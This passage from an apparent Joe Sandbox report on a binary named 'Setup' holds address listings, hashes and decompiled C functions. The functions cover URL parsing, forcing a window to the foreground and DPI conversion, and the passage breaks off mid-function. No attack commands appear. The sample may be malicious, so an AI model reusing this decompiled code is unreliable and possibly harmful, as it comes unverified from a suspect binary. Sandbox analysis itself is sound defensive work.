                                                                                                                                                              0x004cc9ee
                                                                                                                                                              0x004cc9fa
                                                                                                                                                              0x004cca07
                                                                                                                                                              0x004cca18
                                                                                                                                                              0x004cca22
                                                                                                                                                              0x004cca29
                                                                                                                                                              0x004cca2d
                                                                                                                                                              0x004cca32
                                                                                                                                                              0x004cca38
                                                                                                                                                              0x004cca3b
                                                                                                                                                              0x004cca42
                                                                                                                                                              0x004cca47
                                                                                                                                                              0x004cca51
                                                                                                                                                              0x004cca56
                                                                                                                                                              0x004cca56
                                                                                                                                                              0x004cc9ec
                                                                                                                                                              0x004cc9dd
                                                                                                                                                              0x004cc974
                                                                                                                                                              0x004cc974
                                                                                                                                                              0x004cc97b
                                                                                                                                                              0x004cc985
                                                                                                                                                              0x004cc98a
                                                                                                                                                              0x004cc98a
                                                                                                                                                              0x004cc972
                                                                                                                                                              0x004cc8fa
                                                                                                                                                              0x004cc8fa
                                                                                                                                                              0x004cc8ff
                                                                                                                                                              0x004cc907
                                                                                                                                                              0x004cc90e
                                                                                                                                                              0x004cc918
                                                                                                                                                              0x004cc91d
                                                                                                                                                              0x004cc91d
                                                                                                                                                              0x004cca83
                                                                                                                                                              0x004cca8e

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: LoadMemory mem == NULL $ LoadMemory pDoc == NULL $W$W
                                                                                                                                                              • API String ID: 0-61333738
                                                                                                                                                              • Opcode ID: c53eb319cef488d302be499bfc4f72b57fc6207859f3b9e799a0f7a65bd0a51b
                                                                                                                                                              • Instruction ID: f45d82c9f8a196cfc6aee97ef8979deb832657bc0edcf5a1b66d4082df4fedcc
                                                                                                                                                              • Opcode Fuzzy Hash: c53eb319cef488d302be499bfc4f72b57fc6207859f3b9e799a0f7a65bd0a51b
                                                                                                                                                              • Instruction Fuzzy Hash: CA514CB5D00209EBCB04DFA5D985FEEB770FB18314F20421EE415672D0E7795A45CB99
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00424F20 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 109networkCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 81%
                                                                                                                                                              			E00424F20(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, WCHAR* _a4) {
				long _v8;
				char _v16;
				signed int _v20;
				char _v48;
				char _v52;
				char _v53;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				short _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				void* _v116;
				char _v117;
				char _v152;
				char _v153;
				char _v154;
				intOrPtr _v160;
				signed int _t56;
				signed int _t57;
				signed int _t69;
				void* _t83;
				void* _t112;
				void* _t113;
				signed int _t114;

				_t113 = __esi;
				_t112 = __edi;
				_t83 = __ebx;
				_push(0xffffffff);
				_push(0x5178d3);
				_push( *[fs:0x0]);
				_t56 =  *0x561244; // 0xddd124f9
				_t57 = _t56 ^ _t114;
				_v20 = _t57;
				_push(_t57);
				 *[fs:0x0] =  &_v16;
				_v160 = __ecx;
				E004175C0(E00434050( &_v117));
				_v8 = 0;
				if(StrStrW(_a4, L"://") == 0) {
					E00417910(L"http://", E00434050( &_v153));
					_v8 = 1;
					E004181D0( &_v52,  &_v152);
					_v8 = 0;
					E004176E0();
					E004130D0( &_v48, _a4);
					_a4 = E00416A30( &_v48);
				}
				E00451D90(_t112,  &_v116, 0, 0x3c);
				_v116 = 0x3c;
				_v112 = _v160;
				_v108 = 0x104;
				_v100 = _v160 + 0x20c;
				_v96 = 0x104;
				_v88 = _v160 + 0x416;
				_v84 = 0x104;
				_v80 = _v160 + 0x61e;
				_v76 = 0x104;
				_v72 = _v160 + 0x826;
				_v68 = 0x104;
				_v64 = _v160 + 0xa2e;
				_v60 = 0x104;
				_t69 = InternetCrackUrlW(_a4, 0, 0,  &_v116);
				asm("sbb eax, eax");
				_v53 =  ~( ~_t69);
				 *((intOrPtr*)(_v160 + 0x208)) = _v104;
				 *((short*)(_v160 + 0x414)) = _v92;
				_v154 = _v53;
				_v8 = 0xffffffff;
				E004176E0();
				 *[fs:0x0] = _v16;
				return E0044F6C8(_v154, _t83, _v20 ^ _t114, _v160, _t112, _t113);
			}




































                                                                                                                                                              0x00424f20
                                                                                                                                                              0x00424f20
                                                                                                                                                              0x00424f20
                                                                                                                                                              0x00424f23
                                                                                                                                                              0x00424f25
                                                                                                                                                              0x00424f30
                                                                                                                                                              0x00424f37
                                                                                                                                                              0x00424f3c
                                                                                                                                                              0x00424f3e
                                                                                                                                                              0x00424f41
                                                                                                                                                              0x00424f45
                                                                                                                                                              0x00424f4b
                                                                                                                                                              0x00424f5d
                                                                                                                                                              0x00424f62
                                                                                                                                                              0x00424f7a
                                                                                                                                                              0x00424f93
                                                                                                                                                              0x00424f98
                                                                                                                                                              0x00424fa6
                                                                                                                                                              0x00424fab
                                                                                                                                                              0x00424fb5
                                                                                                                                                              0x00424fc1
                                                                                                                                                              0x00424fce
                                                                                                                                                              0x00424fce
                                                                                                                                                              0x00424fd9
                                                                                                                                                              0x00424fe1
                                                                                                                                                              0x00424fee
                                                                                                                                                              0x00424ff1
                                                                                                                                                              0x00425004
                                                                                                                                                              0x00425007
                                                                                                                                                              0x00425019
                                                                                                                                                              0x0042501c
                                                                                                                                                              0x0042502f
                                                                                                                                                              0x00425032
                                                                                                                                                              0x00425045
                                                                                                                                                              0x00425048
                                                                                                                                                              0x0042505a
                                                                                                                                                              0x0042505d
                                                                                                                                                              0x00425070
                                                                                                                                                              0x00425078
                                                                                                                                                              0x0042507c
                                                                                                                                                              0x00425088
                                                                                                                                                              0x00425098
                                                                                                                                                              0x004250a2
                                                                                                                                                              0x004250a8
                                                                                                                                                              0x004250b2
                                                                                                                                                              0x004250c0
                                                                                                                                                              0x004250d5

                                                                                                                                                              APIs
                                                                                                                                                              • StrStrW.SHLWAPI(?,://,00000000,DDD124F9), ref: 00424F72
                                                                                                                                                              • _memset.LIBCMT ref: 00424FD9
                                                                                                                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000003C), ref: 00425070
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CrackInternet_memset
                                                                                                                                                              • String ID: ://$<$http://
                                                                                                                                                              • API String ID: 1413715105-1638580327
                                                                                                                                                              • Opcode ID: 7eb09c8ba5adb2dde5fc887474305d75aa1904fd446edd5ed28df2af248bafcd
                                                                                                                                                              • Instruction ID: f39e0366ce6a2fa3048447456540e6740b4b34e659bafcac72065bd2d148b5cb
                                                                                                                                                              • Opcode Fuzzy Hash: 7eb09c8ba5adb2dde5fc887474305d75aa1904fd446edd5ed28df2af248bafcd
                                                                                                                                                              • Instruction Fuzzy Hash: 765149B4D14258DBEB14DFA4DC81BDDBBB4EF14304F1081AEE509AB282DB746A88CF54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004965D0 Relevance: 10.6, APIs: 7, Instructions: 97threadwindowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E004965D0(struct HWND__* _a4, intOrPtr _a8, struct HWND__* _a12) {
				int _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				long _v28;
				struct HWND__* _v32;
				int _v36;
				long _v40;
				signed int _t39;
				int _t43;
				signed int _t72;
				void* _t73;

				_push(0xffffffff);
				_push(0x50ad5c);
				_push( *[fs:0x0]);
				_t39 =  *0x561244; // 0xddd124f9
				_push(_t39 ^ _t72);
				 *[fs:0x0] =  &_v16;
				_v20 = _t73 - 0x1c;
				_v24 = 0xffffffff;
				_v8 = 0;
				_v40 = 0;
				_v28 = 0;
				_v36 = 0;
				_v32 = 0;
				if(_a12 == 0) {
					_v32 = GetForegroundWindow();
					if(_v32 != 0 || _a8 == 0) {
						L5:
						if(_v32 == _a4 || _a4 == 0) {
							_t43 = 1;
						} else {
							_v40 = GetCurrentThreadId();
							_v28 = GetWindowThreadProcessId(_v32, 0);
							if(_v40 != _v28 && _v28 != 0) {
								_v36 = AttachThreadInput(_v40, _v28, 1);
							}
							E00494C50(0);
							_v36 = SetForegroundWindow(_a4);
							SetFocus(_a4);
							if(_v40 != _v28 && _v28 != 0) {
								AttachThreadInput(_v40, _v28, 0);
							}
							_t43 = _v36;
						}
						goto L15;
					} else {
						_t43 = E00496300(_a4);
						L15:
						 *[fs:0x0] = _v16;
						return _t43;
					}
				}
				_v32 = _a12;
				goto L5;
			}















                                                                                                                                                              0x004965d3
                                                                                                                                                              0x004965d5
                                                                                                                                                              0x004965e0
                                                                                                                                                              0x004965e8
                                                                                                                                                              0x004965ef
                                                                                                                                                              0x004965f3
                                                                                                                                                              0x004965f9
                                                                                                                                                              0x004965fc
                                                                                                                                                              0x00496603
                                                                                                                                                              0x0049660a
                                                                                                                                                              0x00496611
                                                                                                                                                              0x00496618
                                                                                                                                                              0x0049661f
                                                                                                                                                              0x0049662a
                                                                                                                                                              0x0049663a
                                                                                                                                                              0x00496641
                                                                                                                                                              0x0049665a
                                                                                                                                                              0x00496660
                                                                                                                                                              0x00496668
                                                                                                                                                              0x00496672
                                                                                                                                                              0x00496678
                                                                                                                                                              0x00496687
                                                                                                                                                              0x00496690
                                                                                                                                                              0x004966a8
                                                                                                                                                              0x004966a8
                                                                                                                                                              0x004966ad
                                                                                                                                                              0x004966bf
                                                                                                                                                              0x004966c6
                                                                                                                                                              0x004966d2
                                                                                                                                                              0x004966e4
                                                                                                                                                              0x004966e4
                                                                                                                                                              0x004966ea
                                                                                                                                                              0x004966ea
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00496649
                                                                                                                                                              0x0049664d
                                                                                                                                                              0x00496734
                                                                                                                                                              0x00496737
                                                                                                                                                              0x00496745
                                                                                                                                                              0x00496745
                                                                                                                                                              0x00496641
                                                                                                                                                              0x0049662f
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetForegroundWindow.USER32(DDD124F9), ref: 00496634
                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00496672
                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00496681
                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004966A2
                                                                                                                                                              • SetForegroundWindow.USER32(00000000), ref: 004966B9
                                                                                                                                                              • SetFocus.USER32(00000000), ref: 004966C6
                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004966E4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Thread$Window$AttachForegroundInput$CurrentFocusProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3932288733-0
                                                                                                                                                              • Opcode ID: 617358aff3b61d4d8d9e8630e342c39a0dbcefe3371af70bb5a0d2054d0d6b93
                                                                                                                                                              • Instruction ID: 6af58d07c445be9bac44b291cc4ecdaab8991f5e1eb4edf5ac34780dae326464
                                                                                                                                                              • Opcode Fuzzy Hash: 617358aff3b61d4d8d9e8630e342c39a0dbcefe3371af70bb5a0d2054d0d6b93
                                                                                                                                                              • Instruction Fuzzy Hash: 4E4137B5900209EFDF10CF94D849BEEBBB5FB18304F10812AE915A7280D379AD45CFA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00426E60 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 72COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                              			E00426E60(void* __eflags, char _a4, char _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* __ecx;
				signed int _t25;
				intOrPtr _t41;
				signed int _t62;
				void* _t63;

				_push(0xffffffff);
				_push(0x516ce0);
				_push( *[fs:0x0]);
				_push(_t41);
				_t25 =  *0x561244; // 0xddd124f9
				_push(_t25 ^ _t62);
				_t1 =  &_v16; // 0x4267e3
				 *[fs:0x0] = _t1;
				_v20 = _t63 - 0xc;
				_v32 = _t41;
				_v28 = E00420BA0(_v32, 1);
				_v24 = 0;
				_v8 = 0;
				E0041EB00(_v32 + 1, E00415110(_v28),  &_a4);
				_v24 = _v24 + 1;
				_t13 =  &_a8; // 0x4267e3
				E0041EB00(_v32 + 1, E0042AE30(_v28), _t13);
				_v24 = _v24 + 1;
				E0041B050(_v32 + 2, E00441910(_v28), _a12);
				_v8 = 0xffffffff;
				_t23 =  &_v16; // 0x4267e3
				 *[fs:0x0] =  *_t23;
				return _v28;
			}














                                                                                                                                                              0x00426e63
                                                                                                                                                              0x00426e65
                                                                                                                                                              0x00426e70
                                                                                                                                                              0x00426e71
                                                                                                                                                              0x00426e78
                                                                                                                                                              0x00426e7f
                                                                                                                                                              0x00426e80
                                                                                                                                                              0x00426e83
                                                                                                                                                              0x00426e89
                                                                                                                                                              0x00426e8c
                                                                                                                                                              0x00426e99
                                                                                                                                                              0x00426e9c
                                                                                                                                                              0x00426ea3
                                                                                                                                                              0x00426ec1
                                                                                                                                                              0x00426ecc
                                                                                                                                                              0x00426ecf
                                                                                                                                                              0x00426ee6
                                                                                                                                                              0x00426ef1
                                                                                                                                                              0x00426f0b
                                                                                                                                                              0x00426f72
                                                                                                                                                              0x00426f7c
                                                                                                                                                              0x00426f7f
                                                                                                                                                              0x00426f8d

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: allocator
                                                                                                                                                              • String ID: gB$gB
                                                                                                                                                              • API String ID: 3447690668-476456316
                                                                                                                                                              • Opcode ID: 382200b0d8d22de33c340b6a97caba9c3ccf8ac81e440876572f6ba457ab22c5
                                                                                                                                                              • Instruction ID: da325da1d0d0f6029cf94d867a0c2159dc7c1cf2997bc7afbf56aa29c0e544d4
                                                                                                                                                              • Opcode Fuzzy Hash: 382200b0d8d22de33c340b6a97caba9c3ccf8ac81e440876572f6ba457ab22c5
                                                                                                                                                              • Instruction Fuzzy Hash: 1F213DB1E00109AFCB04DF99D852BEFBBB8FB48318F10452EE515A7381D635AA54CBA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0040D4C0 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 25%
                                                                                                                                                              			E0040D4C0(int* _a4, intOrPtr* _a8) {
				int _v8;
				struct HDC__* _v12;
				int _v16;
				signed int _v20;
				signed int _v24;
				int _t37;

				do {
					_v20 = 0 | _a4 != 0x00000000;
					if(_v20 == 0) {
						E00417470(0x80004003);
					}
				} while (0 != 0);
				do {
					_v24 = 0 | _a8 != 0x00000000;
					if(_v24 == 0) {
						E00417470(0x80004003);
					}
				} while (0 != 0);
				_v12 = GetDC(0);
				do {
				} while (0 != 0 || 0 != 0);
				_v16 = GetDeviceCaps(_v12, 0x58);
				_v8 = GetDeviceCaps(_v12, 0x5a);
				ReleaseDC(0, _v12);
				 *_a8 = MulDiv(0x9ec,  *_a4, _v16);
				_t37 = MulDiv(0x9ec, _a4[1], _v8);
				 *(_a8 + 4) = _t37;
				return _t37;
			}









                                                                                                                                                              0x0040d4c6
                                                                                                                                                              0x0040d4cf
                                                                                                                                                              0x0040d4d6
                                                                                                                                                              0x0040d4dd
                                                                                                                                                              0x0040d4dd
                                                                                                                                                              0x0040d4e2
                                                                                                                                                              0x0040d4e6
                                                                                                                                                              0x0040d4ef
                                                                                                                                                              0x0040d4f6
                                                                                                                                                              0x0040d4fd
                                                                                                                                                              0x0040d4fd
                                                                                                                                                              0x0040d502
                                                                                                                                                              0x0040d50e
                                                                                                                                                              0x0040d511
                                                                                                                                                              0x0040d511
                                                                                                                                                              0x0040d525
                                                                                                                                                              0x0040d534
                                                                                                                                                              0x0040d53d
                                                                                                                                                              0x0040d55b
                                                                                                                                                              0x0040d56d
                                                                                                                                                              0x0040d576
                                                                                                                                                              0x0040d57c

                                                                                                                                                              APIs
                                                                                                                                                              • GetDC.USER32(00000000), ref: 0040D508
                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0040D51F
                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0040D52E
                                                                                                                                                              • ReleaseDC.USER32 ref: 0040D53D
                                                                                                                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0040D552
                                                                                                                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0040D56D
                                                                                                                                                                • Part of subcall function 00417470: __CxxThrowException@8.LIBCMT ref: 00417490
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CapsDevice$Exception@8ReleaseThrow
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3795711691-0
                                                                                                                                                              • Opcode ID: 474e44d81c33a4c3ad8fcca12360042be9d1a82ca7a81d2fb1257039810e5e3e
                                                                                                                                                              • Instruction ID: a675958bb8746e427a2099b888aedb08fd49cc9464bf76652de926079c8ca548
                                                                                                                                                              • Opcode Fuzzy Hash: 474e44d81c33a4c3ad8fcca12360042be9d1a82ca7a81d2fb1257039810e5e3e
                                                                                                                                                              • Instruction Fuzzy Hash: 99213E75A00208EFEB40DFA0CC49BAEBBB5FB58305F10C169ED15A7290E7749A45DB51
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0040D580 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 25%
                                                                                                                                                              			E0040D580(int* _a4, intOrPtr* _a8) {
				int _v8;
				struct HDC__* _v12;
				int _v16;
				signed int _v20;
				signed int _v24;
				int _t37;

				do {
					_v20 = 0 | _a4 != 0x00000000;
					if(_v20 == 0) {
						E00417470(0x80004003);
					}
				} while (0 != 0);
				do {
					_v24 = 0 | _a8 != 0x00000000;
					if(_v24 == 0) {
						E00417470(0x80004003);
					}
				} while (0 != 0);
				_v12 = GetDC(0);
				do {
				} while (0 != 0 || 0 != 0);
				_v16 = GetDeviceCaps(_v12, 0x58);
				_v8 = GetDeviceCaps(_v12, 0x5a);
				ReleaseDC(0, _v12);
				 *_a8 = MulDiv(_v16,  *_a4, 0x9ec);
				_t37 = MulDiv(_v8, _a4[1], 0x9ec);
				 *(_a8 + 4) = _t37;
				return _t37;
			}









                                                                                                                                                              0x0040d586
                                                                                                                                                              0x0040d58f
                                                                                                                                                              0x0040d596
                                                                                                                                                              0x0040d59d
                                                                                                                                                              0x0040d59d
                                                                                                                                                              0x0040d5a2
                                                                                                                                                              0x0040d5a6
                                                                                                                                                              0x0040d5af
                                                                                                                                                              0x0040d5b6
                                                                                                                                                              0x0040d5bd
                                                                                                                                                              0x0040d5bd
                                                                                                                                                              0x0040d5c2
                                                                                                                                                              0x0040d5ce
                                                                                                                                                              0x0040d5d1
                                                                                                                                                              0x0040d5d1
                                                                                                                                                              0x0040d5e5
                                                                                                                                                              0x0040d5f4
                                                                                                                                                              0x0040d5fd
                                                                                                                                                              0x0040d61b
                                                                                                                                                              0x0040d62d
                                                                                                                                                              0x0040d636
                                                                                                                                                              0x0040d63c

                                                                                                                                                              APIs
                                                                                                                                                              • GetDC.USER32(00000000), ref: 0040D5C8
                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0040D5DF
                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0040D5EE
                                                                                                                                                              • ReleaseDC.USER32 ref: 0040D5FD
                                                                                                                                                              • MulDiv.KERNEL32(00000000,?,000009EC), ref: 0040D612
                                                                                                                                                              • MulDiv.KERNEL32(?,?,000009EC), ref: 0040D62D
                                                                                                                                                                • Part of subcall function 00417470: __CxxThrowException@8.LIBCMT ref: 00417490
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CapsDevice$Exception@8ReleaseThrow
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3795711691-0
                                                                                                                                                              • Opcode ID: 926a56defdbf55e2c9f6654e5b0a3c07791f1a973d1cb76345805afdf9828b57
                                                                                                                                                              • Instruction ID: 7a998df5e12f5b6324f2c60fdb4a6c7c9e544ff4a4d7dd48a3ffa3a8284a9534
                                                                                                                                                              • Opcode Fuzzy Hash: 926a56defdbf55e2c9f6654e5b0a3c07791f1a973d1cb76345805afdf9828b57
                                                                                                                                                              • Instruction Fuzzy Hash: 2A213BB5A00209EFEB04DFA0CC45BAEBBB5FB58305F00C569FD15A7280DB788A45DB54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004F0440 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 153COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                              			E004F0440(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				signed int _t53;
				intOrPtr _t62;
				intOrPtr _t65;
				signed short* _t70;
				intOrPtr _t81;
				void* _t82;
				void* _t123;
				void* _t124;
				signed int _t125;
				void* _t126;
				void* _t127;

				_t124 = __esi;
				_t123 = __edi;
				_t82 = __ebx;
				_push(0xffffffff);
				_push(0x50673f);
				_push( *[fs:0x0]);
				_t127 = _t126 - 0x30;
				_t53 =  *0x561244; // 0xddd124f9
				_push(_t53 ^ _t125);
				 *[fs:0x0] =  &_v16;
				_v56 = __ecx;
				if(_a8 != 0) {
					_v24 = 0;
					while(1) {
						_v24 = E00405200(_a4 + 4, __eflags, _a8, _v24);
						__eflags = _v24 - 0xffffffff;
						if(_v24 == 0xffffffff) {
							break;
						}
						__eflags = _v24;
						if(_v24 <= 0) {
							L8:
							_v24 = E0044F9A4(_a8) + _v24;
							_t62 = E00451A16(L" :\"",  *(E004051D0(_t82, _a4 + 4, _t123, _t124, _v24)) & 0x0000ffff);
							_t127 = _t127 + 0xc;
							__eflags = _t62;
							if(__eflags != 0) {
								L12:
								_v24 = E00405230(_a4 + 4, __eflags, L" \"", _v24);
								__eflags = _v24 - 0xffffffff;
								if(_v24 == 0xffffffff) {
									L14:
									_t65 = 0;
									L21:
